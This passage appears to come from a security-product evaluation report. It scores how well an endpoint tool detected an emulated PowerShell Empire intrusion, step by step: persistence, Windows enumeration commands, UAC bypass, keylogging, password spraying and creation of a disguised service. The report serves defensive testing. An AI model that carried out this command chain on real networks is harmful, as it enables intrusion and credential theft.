Telemetry showed a file read event for the .vsdx file from the network shared drive. Vendor stated that more information would be available if their firewall appliance was installed and activated.
Telemetry showing a file read event for the .vsdx file from the network shared drive
Exfiltration Over Command and Control Channel
(T1041)
None
  
No detection capability demonstrated for this procedure, though port 53 network traffic to/from freegoogleadsenseinfo.com (C2 domain) was observed. Vendor stated that more information would be available if their firewall appliance was installed and activated.
Port 53 network traffic to/from freegoogleadsenseinfo.com (C2 domain) (does not count as a detection)
10.A.1
Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32
Registry Run Keys / Startup Folder
(T1060)
Telemetry
  
Telemetry showed cmd.exe executing autoupdate.bat from the Startup folder.
Telemetry showing cmd.exe executing autoupdate.bat from the Startup folder
10.A.2
Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
Scheduled Task
(T1053)
Telemetry
  
Telemetry showed the execution sequence for rundll32.exe executing updater.dll with a parent of svchost.exe running with command-line arguments "-k netsvcs -p -s Schedule".
Telemetry showing svchost.exe running with command-line arguments "-k netsvcs -p -s Schedule"
Telemetry showing rundll32.exe executing updater.dll
10.B.1
RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
Remote Desktop Protocol
(T1076)
Telemetry
  
Telemetry showed a successful incoming connection to Conficker (10.0.0.5) over port 3389.
Enrichment
  
The capability enriched the network connection over port 3389 with the correct ATT&CK Technique (Remote Desktop Protocol).
Telemetry showed a successful incoming connection to Conficker (10.0.0.5) over port 3389
Enrichment of the network connection over port 3389 with the correct ATT&CK Technique (Remote Desktop Protocol)
Valid Accounts
(T1078)
Telemetry
  
Telemetry showed userinit.exe as well as explorer.exe spawn as the user Jesse.
Telemetry showing userinit.exe as well as explorer.exe spawn as the user Jesse
11.A.1
Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)
Scripting
(T1064)
Specific Behavior
  
A Specific Behavior alert was generated for the execution of the windows script engine The alert was tagged with the correct ATT&CK Technique (Scripting).
Specific Behavior
  
A Specific Behavior alert was generated for PowerShell execution. The alert was tagged with a related Technique (PowerShell)
Specific Behavior
  
A Specific Behavior alert was generated for suspicious PowerShell activity
Indicator of Compromise
  
Indicator of Compromise alerts were generated for suspicious PowerShell strings.
Indicator of Compromise
  
An Indicator of Compromise alert was generated identifying PowerShell Empire.
Specific Behavior
  
A Specific Behavior alert was generated for PowerShell execution with base64 encoded commands.
Telemetry (Tainted)
  
 
Telemetry showed wscript.exe executing autoupdate.vbs as well as the resulting powershell.exe execution. The telemetry was tainted by a parent alert on wscript.exe.
Specific Behavior alert for execution of the windows script engine tagged with the correct ATT&CK Technique (Scripting)
Specific Behavior alert for PowerShell (execution) tagged with a related Technique (PowerShell)
Specific Behavior alert for suspicious PowerShell activity
Indicator of Compromise alerts for suspicious PowerShell strings
Indicator of Compromise alert identifying PowerShell Empire
Specific Behavior alert for PowerShell execution with base64 encoded commands
Telemetry showing wscript.exe executing autoupdate.vbs (tainted by a parent alert on wscript.exe)
Telemetry showing powershell.exe running with command-line arguments (tainted by a parent alert on wscript.exe)
11.B.1
Empire: C2 channel established
Commonly Used Port
(T1043)
Telemetry (Tainted)
  
 
Telemetry showed port 443 network connections to www.freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent alert on wscript.exe. Vendor stated that more information would be available if their firewall appliance was installed and activated.
Enrichment (Tainted)
  
 
The capability enriched the port 443 network connection with the correct ATT&CK Technique (Commonly Used Port). The data was tainted by a parent alert on wscript.exe. Vendor stated that more information would be available if their firewall appliance was installed and activated.
General Behavior (Tainted)
  
 
General Behavior alerts were generated for PowerShell making network connections to the internet as well as Wscript connecting to an external network. The alerts were tainted by a parent alert on wscript.exe. Vendor stated that more information would be available if their firewall appliance was installed and activated.
Telemetry showing port 443 network connections to www.freegoogleadsenseinfo.com (C2 domain) (tainted by a parent alert on wscript.exe)
Enrichment of the port 443 network connection with the correct ATT&CK Technique (Commonly Used Port) (tainted by a parent alert on wscript.exe)
General Behavior alerts for PowerShell making network connections to the internet as well as Wscript connecting to an external network (tainted by a parent alert on wscript.exe)
Standard Application Layer Protocol
(T1071)
None
  
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated.
Standard Cryptographic Protocol
(T1032)
None
  
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated.
12.A.1
Empire: 'route print' via PowerShell
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing route.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
  
The capability enriched route.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery).
Telemetry showing powershell.exe executing route.exe with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of route.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery)
12.A.2
Empire: 'ipconfig /all' via PowerShell
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing ipconfig.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
  
The capability enriched ipconfig.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery).
Telemetry showing powershell.exe executing ipconfig.exe with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of ipconfig.exe executing with the correct ATT&CK Technique (System Network Configuration Discovery)
12.B.1
Empire: 'whoami /all /fo list' via PowerShell
System Owner / User Discovery
(T1033)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing whoami.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing powershell.exe executing whoami.exe with command-line arguments (tainted by a parent alert on wscript.exe)
12.C.1
Empire: 'qprocess *' via PowerShell
Process Discovery
(T1057)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing qprocess.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment (Tainted)
  
 
The capability enriched the execution of qprocess.exe as the enumeration of running processes via the command line. The data was tainted by a parent alert on wscript.exe.
Enrichment
  
The capability enriched qprocess.exe executing with a related ATT&CK Technique (System Service Discovery).
Telemetry showing powershell.exe executing qprocess.exe with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of execution of qprocess.exe as the enumeration of running processes via the command line (tainted by a parent alert on wscript.exe)
Enrichment of qprocess.exe executing with a related ATT&CK Technique (System Service Discovery)
12.D.1
Empire: 'net start' via PowerShell
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment (Tainted)
  
 
The capability enriched net.exe executing as the execution of an enumeration command. The data was tainted by a parent alert on wscript.exe.
General Behavior (Tainted)
  
 
A General Behavior alert was generated for net.exe executing as an enumeration command called by a commonly abused causality group owner (CGO, wscipt.exe). The data was tainted by a parent alert on wscript.exe.
Telemetry showing powershell.exe executing net.exe with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of net.exe executing as the execution of an enumeration command (tainted by a parent alert on wscript.exe)
General Behavior alert for net.exe executing as a enumeration command called by a commonly abused causality group owner (CGO, wscript.exe) (tainted by a parent alert on wscript.exe)
12.E.1
Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques
Scripting
(T1064)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing with command-line arguments as well as PowerShell module (.psm) and script (.ps1) files being written to disk. The telemetry was tainted by a parent alert on wscript.exe.
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for PowerShell execution with base64 encoded commands. The alert was tainted by a parent alert on wscript.exe.
Indicator of Compromise
  
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire WinEnum.
Telemetry showing powershell.exe executing with command-line arguments as well as PowerShell module (.psm) and script (.ps1) files being written to disk (tainted by a parent alert on wscript.exe)
Specific Behavior alert for PowerShell execution with base64 encoded commands (tainted by a parent alert on wscript.exe)
Indicator of Compromise alert identifying suspicious PowerShell strings as Empire WinEnum
12.E.1.1
Empire: WinEnum module included enumeration of user information
System Owner / User Discovery
(T1033)
Indicator of Compromise
  
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire UserInfo.
Indicator of Compromise alert identifying suspicious PowerShell strings as Empire UserInfo
12.E.1.2
Empire: WinEnum module included enumeration of AD group memberships
Permission Groups Discovery
(T1069)
None
  
No detection capability demonstrated for this procedure.
12.E.1.3
Empire: WinEnum module included enumeration of password policy information
Password Policy Discovery
(T1201)
None
  
No detection capability demonstrated for this procedure.
12.E.1.4.1
Empire: WinEnum module included enumeration of recently opened files
File and Directory Discovery
(T1083)
Enrichment
  
The capability enriched powershell.exe executing with command-line arguments as suspicious and the correct ATT&CK Technique (File and Directory Discovery).
Enrichment of powershell.exe executing with command-line arguments as suspicious and the correct ATT&CK Technique (File and Directory Discovery)
12.E.1.4.2
Empire: WinEnum module included enumeration of interesting files
File and Directory Discovery
(T1083)
Enrichment
  
The capability enriched powershell.exe executing with command-line arguments as suspicious and the correct ATT&CK Technique (File and Directory Discovery).
Enrichment of powershell.exe executing with command-line arguments as suspicious and the correct ATT&CK Technique (File and Directory Discovery)
12.E.1.5
Empire: WinEnum module included enumeration of clipboard contents
Clipboard Data
(T1115)
Enrichment
  
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Clipboard Data).
Enrichment of powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Clipboard Data)
12.E.1.6.1
Empire: WinEnum module included enumeration of system information
System Information Discovery
(T1082)
Indicator of Compromise
  
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire SysImfo.
Indicator of Compromise alert identifying suspicious PowerShell strings as Empire SysInfo
12.E.1.6.2
Empire: WinEnum module included enumeration of Windows update information
System Information Discovery
(T1082)
None
  
No detection capability demonstrated for this procedure.
12.E.1.7
Empire: WinEnum module included enumeration of system information via a Registry query
Query Registry
(T1012)
Enrichment (Tainted)
  
 
The capability enriched the enumeration of system information via a Registry query as suspicious. The data was tainted by a parent alert on wscript.exe.
Indicator of Compromise
  
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire SysImfo.
Enrichment of the enumeration of system information via a Registry query as suspicious (tainted by a parent alert on wscript.exe)
Indicator of Compromise alert identifying suspicious PowerShell strings as Empire SysInfo
12.E.1.8
Empire: WinEnum module included enumeration of services
System Service Discovery
(T1007)
Enrichment
  
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery).
Enrichment of powershell.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery)
12.E.1.9.1
Empire: WinEnum module included enumeration of available shares
Network Share Discovery
(T1135)
Enrichment
  
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Discovery).
Enrichment of powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Discovery)
12.E.1.9.2
Empire: WinEnum module included enumeration of mapped network drives
Network Share Discovery
(T1135)
Enrichment
  
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Discovery).
Enrichment of powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Discovery)
12.E.1.10.1
Empire: WinEnum module included enumeration of AV solutions
Security Software Discovery
(T1063)
Telemetry
  
Telemetry showed an event log for the WMI query of the system AV products.
Telemetry showing an event log for the WMI query of the system AV products
12.E.1.10.2
Empire: WinEnum module included enumeration of firewall rules
Security Software Discovery
(T1063)
Enrichment
  
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Security Software Discovery).
Enrichment of powershell.exe executing with command-line arguments with the correct ATT&CK Technique (Security Software Discovery)
12.E.1.11
Empire: WinEnum module included enumeration of network adapters
System Network Configuration Discovery
(T1016)
Indicator of Compromise
  
An Indicator of Compromise alert was generated identifying suspicious PowerShell strings as Empire NetInfo.
Indicator of Compromise alert identifying suspicious PowerShell strings as Empire NetInfo
12.E.1.12
Empire: WinEnum module included enumeration of established network connections
System Network Connections Discovery
(T1049)
Enrichment
  
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (System Network Connections Discovery).
Enrichment of powershell.exe executing with command-line arguments with the correct ATT&CK Technique (System Network Connections Discovery)
12.F.1
Empire: 'net group "Domain Admins" /domain' via PowerShell
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment (Tainted)
  
 
The capability enriched the execution of net.exe and net1.exe as the possible enumeration of administrator groups. The data was tainted by a parent alert on wscript.exe.
Enrichment (Tainted)
  
 
The capability enriched the execution of net.exe and net1.exe as an enumeration command. The data was tainted by a parent alert on wscript.exe.
Enrichment
  
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Permission Groups Discovery).
Telemetry showing powershell.exe executing net with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of the execution of net.exe and net1.exe as the possible enumeration of administrator groups (tainted by a parent alert on wscript.exe)
Enrichment of the execution of net.exe and net1.exe as an enumeration command (tainted by a parent alert on wscript.exe)
Enrichment of net.exe executing with command-line arguments with the correct ATT&CK Technique (Permission Groups Discovery)
12.F.2
Empire: 'net localgroup administrators' via PowerShell
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment (Tainted)
  
 
The capability enriched the execution of net.exe and net1.exe as the possible enumeration of administrator groups. The data was tainted by a parent alert on wscript.exe.
Enrichment
  
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Permission Groups Discovery).
Telemetry showing powershell.exe executing net with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of the execution of net.exe and net1.exe as the possible enumeration of administrator groups (tainted by a parent alert on wscript.exe)
Enrichment of net.exe executing with command-line arguments with the correct ATT&CK Technique (Permission Groups Discovery)
12.G.1
Empire: 'net user' via PowerShell
Account Discovery
(T1087)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
  
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Account Discovery).
Telemetry showing powershell.exe executing net with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of net.exe executing with command-line arguments with the correct ATT&CK Technique (Account Discovery)
12.G.2
Empire: 'net user /domain' via PowerShell
Account Discovery
(T1087)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
  
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Account Discovery).
Telemetry showing powershell.exe executing net with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of net.exe executing with command-line arguments with the correct ATT&CK Technique (Account Discovery)
13.A.1
Empire: 'net group "Domain Computers" /domain' via PowerShell
Remote System Discovery
(T1018)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment (Tainted)
  
 
The capability enriched the execution of net.exe and net1.exe as an enumeration command. The data was tainted by a parent alert on wscript.exe.
Telemetry showing powershell.exe executing net with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of the execution of net.exe and net1.exe as an enumeration command (tainted by a parent alert on wscript.exe)
13.B.1
Empire: 'net use' via PowerShell
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing powershell.exe executing net with command-line arguments (tainted by a parent alert on wscript.exe)
13.B.2
Empire: 'netstat -ano' via PowerShell
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing netstat with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing powershell.exe executing netstat with command-line arguments (tainted by a parent alert on wscript.exe)
13.C.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing reg with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
  
The capability enriched reg.exe executing with command-line arguments with the correct ATT&CK Technique (Query Registry).
Telemetry showing powershell.exe executing reg with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of reg.exe executing with command-line arguments with the correct ATT&CK Technique (Query Registry)
14.A.1
Empire: UAC bypass module downloaded and executed a new Empire stager (wdbypass)
Bypass User Account Control
(T1088)
Telemetry
  
Telemetry showed a process integrity level change from parent powershell.exe (medium / 8192) to child powershell.exe (high / 12288).
Indicator of Compromise
  
An Indicator of Compromise alert was generated identifying a PowerShell Empire script performing the bypass UAC attack.
Telemetry showing powershell.exe running as medium integrity level (8192)
Telemetry showing powershell.exe running as high integrity level (12288)
Indicator of Compromise alert identifying a PowerShell Empire script performing the bypass UAC attack.
Commonly Used Port
(T1043)
Telemetry
  
Telemetry showed an outgoing network connection to www.freegoogleadsenseinfo.com (C2 domain) over port 8080.
Telemetry showing an outgoing network connection to www.freegoogleadsenseinfo.com (C2 domain) over port 8080
Remote File Copy
(T1105)
None
  
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080.
Telemetry showing decoded PowerShell showing download request over HTTP (does not count as a detection due to decoding outside of capability)
Standard Application Layer Protocol
(T1071)
None
  
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080.
Telemetry showing decoded PowerShell showing download request over HTTP (does not count as a detection due to decoding outside of capability)
15.A.1
Empire: Built-in keylogging module executed to capture keystrokes of user Bob
Application Window Discovery
(T1010)
Telemetry
  
Telemetry showed the decoded PowerShell script, which includes the API call GetForegroundWindow to enumerate the active window.
Indicator of Compromise
  
An Indicator of Compromise alert was generated identifying a PowerShell Empire script logging keys pressed, time, and the active window.
Telemetry showing decoded PowerShell script containing the API call GetForegroundWindow
Indicator of Compromise alert identifying a PowerShell Empire script logging keys pressed, time, and the active window
Input Capture
(T1056)
Enrichment
  
The capability enriched the execution of a specific API call as keylogging and suspicious activity.
Indicator of Compromise
  
An Indicator of Compromise alert was generated identifying a PowerShell Empire script logging keys pressed, time, and the active window.
Enrichment of the execution of a specific API call as keylogging and suspicious activity
Indicator of Compromise alert identifying a PowerShell Empire script logging keys pressed, time, and the active window
15.B.1
Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Credentials in Files
(T1081)
Telemetry
  
Telemetry showed a file read event for IT_tasks.txt.
Telemetry showing a file read event for IT_tasks.txt
16.A.1
Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda
Brute Force
(T1110)
Telemetry (Tainted)
  
 
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying. The telemetry was tainted by a parent alert on wscript.exe.
General Behavior
  
A General Behavior alert was generated for sensitive administrative shares mapping with unexpected parent.
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.4 (Morris) as local Kmitnick (tainted by a parent alert on wscript.exe)
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.6 (Nimda) as domain user Frieda (tainted by a parent alert on wscript.exe)
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.6 (Nimda) as domain user Bob (tainted by a parent alert on wscript.exe)
General Behavior alert for a sensitive administrative shares mapping with unexpected parent
Windows Admin Shares
(T1077)
Telemetry (Tainted)
  
 
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying. The telemetry was tainted by a parent alert on wscript.exe.
Specific Behavior
  
A Specific Behavior alert was generated for a net.exe logon attempt to ADMIN$. The alert was tagged with the correct ATT&CK Technique (Windows Admin Shares).
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.4 (Morris) as local user Kmitnick (tainted by a parent alert on wscript.exe)
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.6 (Nimda) as domain user Frieda (tainted by a parent alert on wscript.exe)
Telemetry showing net.exe logon attempt to ADMIN$ on 10.0.1.6 (Nimda) as domain user Bob (tainted by a parent alert on wscript.exe)
Specific Behavior alert for a net.exe logon attempt to ADMIN$ tagged with the correct ATT&CK Technique (Windows Admin Shares)
16.B.1
Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
Windows Admin Shares
(T1077)
Telemetry (Tainted)
  
 
Telemetry showed a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) as local Kmitnick. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) as local user Kmitnick (tainted by a parent alert on wscript.exe)
Valid Accounts
(T1078)
Telemetry (Tainted)
  
 
Telemetry showed a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) using valid credentials for user Kmitnick followed by an event for the credentials being validated by the DC. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
  
The capability enriched an lsass.exe event with the correct ATT&CK Technique (Valid Accounts).
Telemetry showing a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) using valid credentials for user Kmitnick (tainted by a parent alert on wscript.exe)
Telemetry showing an event for the logon credentials being validated by the DC (tainted by a parent alert on wscript.exe)
Enrichment of an lsass.exe event with the correct ATT&CK Technique (Valid Accounts).
Brute Force
(T1110)
Telemetry (Tainted)
  
 
Telemetry showed a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) as local user Kmitnick followed by an event for the credentials being validated by the DC. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) as local Kmitnick (tainted by a parent alert on wscript.exe)
Telemetry showing an event for the logon credentials being validated by the DC (tainted by a parent alert on wscript.exe)
16.C.1
Empire: 'net use /delete' via PowerShell
Network Share Connection Removal
(T1126)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
  
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Connection Removal).
Telemetry showing powershell.exe executing net with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of net.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Connection Removal)
16.D.1
Empire: Successful authentication targeted Windows admin shares on Conficker (10.0.0.5)
Windows Admin Shares
(T1077)
Telemetry (Tainted)
  
 
Telemetry showed a net.exe logon attempt to C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing a net.exe logon attempt to C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick (tainted by a parent alert on wscript.exe)
Valid Accounts
(T1078)
Telemetry (Tainted)
  
 
Telemetry showed a net.exe logon attempt to C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick followed by a event for a successful login. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showing a net.exe logon attempt to C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick (tainted by a parent alert on wscript.exe)
Telemetry showing a event for a successful login by user Kmitnick (tainted by a parent alert on wscript.exe)
16.E.1
Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)
Remote File Copy
(T1105)
Telemetry
  
Telemetry showed file create and write events for autoupdate.vbs.
Telemetry showing file create and write events for autoupdate.vbs
16.F.1
Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick
Command-Line Interface
(T1059)
Telemetry (Tainted)
  
 
Telemetry showed cmd.exe executing autoupdate.vbs. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
  
The capability enriched wscript.exe executing autoupdate.vbs with a related ATT&CK Technique (Scripting).
Indicator of Compromise
  
An Indicator of Compromise Alert was generated identify PowerShell Empire using the Runas functionality.
Telemetry showing cmd.exe executing autoupdate.vbs (tainted by a parent alert on wscript.exe)
Enrichment of wscript.exe executing autoupdate.vbs with a related ATT&CK Technique (Scripting).
Indicator of Compromise Alert identifying PowerShell Empire using the Runas functionality
16.G.1
Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)
Remote File Copy
(T1105)
Telemetry
  
Telemetry showed file create and write events for update.vbs.
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for a script being modified/moved to a remote location. The alert was tainted by a parent alert on wscript.exe.
Telemetry showed file create and write events for update.vbs
Specific Behavior alert for a script being modified/moved to a remote location (tainted by a parent alert on wscript.exe)
16.H.1
Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing sc with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
General Behavior (Tainted)
  
 
A General Behavior alert was generated for the sc utility be used to perform actions of remote services. The alert was tainted by a parent alert on wscript.exe.
Enrichment
  
The capability enriched sc.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery).
Telemetry showing powershell.exe executing sc with command-line arguments (tainted by a parent alert on wscript.exe)
General Behavior alert for the sc utility be used to perform actions of remote services (tainted by a parent alert on wscript.exe)
Enrichment of sc.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery)
16.I.1
Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)
New Service
(T1050)
Telemetry (Tainted)
  
 
Telemetry showed execution of sc.exe with command-line arguments to create a new AdobeUpdater service containing a binPath pointed to cmd.exe with arguments to execute update.vbs. Telemetry also showed the creation of Registry keys associated with this new service. The telemetry was tainted by a parent alert on wscript.exe.
Specific Behavior (Tainted)
  
 
A Specific Behavior alert was generated for a new service created via the command line. The alert was tainted by a parent alert on wscript.exe.
Enrichment
  
The capability enriched sc.exe executing with the correct ATT&CK Technique (New Service).
Telemetry showing execution of sc.exe to create a new AdobeUpdater service (tainted by a parent alert on wscript.exe)
Telemetry showing the creation of Registry keys associated with the AdobeUpdater service
Specific Behavior alert for a new service created via the command line (tainted by a parent alert on wscript.exe)
Enrichment of sc.exe executing with the correct ATT&CK Technique (New Service)
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry showed execution of sc.exe with command-line arguments to set the service description. An analyst could use this information to determine it is not a legitimate service. The telemetry was tainted by a parent alert on wscript.exe.
Telemetry showed execution of sc.exe with command-line arguments (tainted by a parent alert on wscript.exe)
16.J.1
Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing sc.exe with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe.
Enrichment (Tainted)
  
 
The capability enriched powershell.exe executing sc.exe as enumeration of services via the command line. The data was tainted by a parent alert on wscript.exe.
Telemetry showing powershell.exe executing sc.exe with command-line arguments (tainted by a parent alert on wscript.exe)
Enrichment of powershell.exe executing sc.exe as enumeration of services via the command line (tainted by a parent alert on wscript.exe)
16.K.1
Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)
File and Directory Discovery
(T1083)
Telemetry (Tainted)
  
 
Telemetry showed a file read event for update.vbs. The telemetry was tainted by a parent alert on wscript.exe The process tree showing taintedness is visible within the same UI but did not fit within the current frame.
Telemetry showing a file read event for update.vbs (tainted by a parent alert on wscript.exe)
16.L.1
Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)
Service Execution
(T1035)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing sc with command-line arguments. As part of the service, telemetry also showed cmd.exe executing update.vbs on 10.0.0.4 (Creeper). The telemetry was tainted by a parent alert on wscript.exe.
Enrichment
  
The capability enriched sc.exe executing with command-line arguments with the correct ATT&CK Technique (Service Execution).
Telemetry showing powershell.exe executing sc with command-line arguments (tainted by a parent alert on wscript.exe)
Telemetry showing cmd.exe executing update.vbs on 10.0.0.4 (Creeper)
Enrichment of sc.exe executing with command-line arguments with the correct ATT&CK Technique (Service Execution)
17.A.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing reg with command-line arguments. The telemetry was tainted by a parent alert on cmd.exe.
Enrichment (Tainted)
  
 
The capability enriched reg.exe executing with command-line arguments as the terminal server key queried by the reg utility. The data was tainted by a parent alert on cmd.exe.
Enrichment
  
The capability enriched reg.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery).
Telemetry showing powershell.exe executing reg with command-line arguments (tainted by a parent alert on cmd.exe)
Enrichment of reg.exe executing with command-line arguments as the terminal server key queried by the reg utility (tainted by a parent alert on cmd.exe)
Enrichment of reg.exe executing with command-line arguments with the correct ATT&CK Technique (System Service Discovery).
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe executing reg with command-line arguments to check if terminal services were enabled. The telemetry was tainted by a parent alert on cmd.exe.
Enrichment (Tainted)
  
 
The capability enriched reg.exe executing with command-line arguments as the terminal server key queried by the reg utility. The data was tainted by a parent alert on cmd.exe.
Enrichment
  
The capability enriched reg.exe executing with command-line arguments with a related ATT&CK Technique (System Service Discovery).
Telemetry showing powershell.exe executing reg with command-line arguments to check if terminal services were enabled. (tainted by a parent alert on cmd.exe)
